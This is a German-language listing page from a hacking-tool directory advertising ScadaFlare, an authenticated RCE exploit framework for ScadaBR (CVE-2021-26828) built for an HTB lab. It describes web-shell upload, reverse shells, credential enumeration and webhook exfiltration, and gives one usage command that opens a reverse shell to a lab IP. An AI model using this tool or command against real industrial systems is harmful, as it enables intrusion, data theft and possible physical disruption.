Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Authentifiziertes RCE-Exploit-Framework für ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Tools/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Payload-GenerierungSchwachstellenanalyseExploitationSCADA/ICS-SicherheitWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and ControlRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

528vor 10 MonatenNoch nicht geprüft

ScadaFlare Authentifiziertes RCE-Exploit-Framework für ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ScadaFlare - Toolkit für authentifizierte RCE-Ausnutzung (CVE-2021-26828)

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Ein modularer Post-Auth-RCE-Exploit, der auf ScadaBR <1.1.0 abzielt und für Red-Team-Einsätze erweitert wurde.

ScadaFlare Demo

Funktionen

  • Lädt eine waffenisierte .jsp-Shell über view_edit.shtm hoch
  • Unterstützt Linux- & Windows-Payloads
  • SOCKS5-/HTTP-Proxy-Unterstützung
  • Reverse-Shell-Auslöser (Standard oder Base64)
  • Enumerations-Module (DB, Zugangsdaten, Log4Shell usw.)
  • Webhook-Exfiltration (Slack / Discord)
  • Generierung von Metasploit-Ressourcenskripten
  • Cleanup-Unterstützung (Kill Switch)

Zuordnung zu MITRE-ATT&CK-Techniken

PhaseTechnikID
Erster Zugriff (nach Authentifizierung)Valid AccountsT1078
AusführungExploit Public-Facing ApplicationT1190
BefehlsausführungWeb ShellT1505.003
BerechtigungsaktionenModify Web ContentT1505
Zugriff auf AnmeldedatenCredential in Configuration FilesT1552.001
ErkundungRemote System DiscoveryT1018
ExfiltrationExfiltration Over Web ServiceT1567.002
Umgehung der VerteidigungProxy & Protocol TunnelingT1090

CVE

  • CVE-2021-26828
  • Entdeckt von Fellipe Oliveira
  • Exploit verbessert & modularisiert

Warum dieses Tool existiert

Dieser Exploit wurde während der Analyse des HTB-Pro-Lab-Szenarios „Alchemy“ entwickelt. Der ursprüngliche PoC von Fellipe Oliveira war solide, aber:

In Python 2 geschrieben

Es fehlten moderne Funktionen wie Proxy-Unterstützung, Shell-Cleanup und Enumerations-Verkettung

Er war schwer zu erweitern oder in Red-Team-Workflows zu integrieren

Diese Version, ScadaFlare, ist eine vollständige Neufassung in Python 3 mit modularer Unterstützung, mehreren Evasions-Strategien, OS-Erkennungs-Override, Webhook-Integration, SOCKS-Proxy-Unterstützung und Enumerations-Ketten für den praktischen Einsatz durch Operatoren.

Verwendung

python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Nur für legale und ethische Nutzung

ScadaFlare ist ausschließlich konzipiert für:

  • Ausbildung im ethischen Hacking
  • Tests in SCADA-Laboren
  • Defensive Forschung & Schwachstellenvalidierung

Unbefugte Nutzung gegen reale industrielle Systeme kann:

  • Physische Prozesse stören
  • Schäden oder Sicherheitsgefahren verursachen
  • Zu schwerwiegenden rechtlichen Konsequenzen führen

Durch die Nutzung dieses Tools übernehmen Sie die volle Verantwortung für:

  • Das Einholen ausdrücklicher schriftlicher Genehmigungen
  • Das ausschließliche Arbeiten in genehmigten Umgebungen

Lizenz

MIT-Lizenz – siehe LICENSE

Tool herunterladen